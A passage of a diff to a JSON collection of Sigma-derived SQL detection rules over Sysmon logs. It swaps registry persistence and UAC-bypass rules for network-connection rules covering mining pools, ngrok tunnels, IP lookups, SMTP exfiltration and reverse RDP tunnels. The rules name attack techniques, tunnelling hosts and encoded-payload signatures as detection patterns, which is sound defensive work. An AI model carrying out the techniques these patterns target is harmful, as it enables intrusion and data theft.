'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru'))" ], - "filename": "registry_set_aedebug_persistence.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "CrashControl CrashDump Disabled", - "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "title": "Excel Network Connections", + "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "status": "experimental", - "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", "tags": [ - "attack.t1564", - "attack.t1112" + "attack.execution", + "attack.t1203" ], "falsepositives": [ - "Legitimate disabling of crashdumps" + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" ], - "filename": "registry_set_crashdump_disabled.yml" + "filename": "net_connection_win_excel_outbound_network_connection.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", - "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Network Connection to IP Lookup Service APIs", + "id": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", + "status": "experimental", + "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.", + "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Legitimate use of the external websites for troubleshooting or network monitoring" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationHostname LIKE '%api.2ip.ua%' ESCAPE '\\' OR DestinationHostname LIKE '%api.ipify.org%' ESCAPE '\\' OR DestinationHostname LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%canireachthe.net%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR DestinationHostname LIKE '%curlmyip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%edns.ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%eth0.me%' ESCAPE '\\' OR DestinationHostname LIKE '%freegeoip.app%' ESCAPE '\\' OR DestinationHostname LIKE '%icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ident.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.anysrc.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.tyk.nu%' ESCAPE '\\' OR DestinationHostname LIKE '%ipaddressworld.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipecho.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ipinfo.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ipof.in%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipwho.is%' ESCAPE '\\' OR DestinationHostname LIKE '%l2.io%' ESCAPE '\\' OR DestinationHostname LIKE '%myexternalip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wgetip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_susp_external_ip_lookup.yml" }, { - "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", - "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "status": "experimental", - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Rundll32 Internet Connection", + "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "status": "test", + "description": "Detects a rundll32 that communicates with public IP addresses", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.011", + "attack.execution" ], "falsepositives": [ - "Administrator actions" + "Communication to other corporate systems that use IP addresses from public address spaces" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" ], - "filename": "registry_set_enabling_turnoffcheck.yml" + "filename": "net_connection_win_rundll32_net_connections.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "title": "HH.EXE Network Connections", + "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "status": "experimental", + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence" + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_hh.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", - "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via Scrobj.dll COM Hijacking", - "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "title": "Suspicious Outbound SMTP Connections", + "id": "9976fa64-2804-423c-8a5b-646ade840773", "status": "experimental", - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate use of the dll." + "Other SMTP tools" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND Details LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND Image LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_scrobj_dll.yml" + "filename": "net_connection_win_susp_outbound_smtp_connections.yml" }, { - "title": "Registry Modification to Hidden File Extension", - "id": "5df86130-4e95-4a54-90f7-26541b40aec2", - "status": "test", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", + "status": "experimental", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Administrative scripts" + "Legitimate use of ngrok" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND Details = 'DWORD (0x00000002)')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" ], - "filename": "registry_set_hidden_extention.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", - "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "status": "test", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.command_and_control", "attack.t1105" @@ -34718,4656 +34576,4829 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", + "status": "experimental", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" + "attack.defense_evasion" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", - "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' 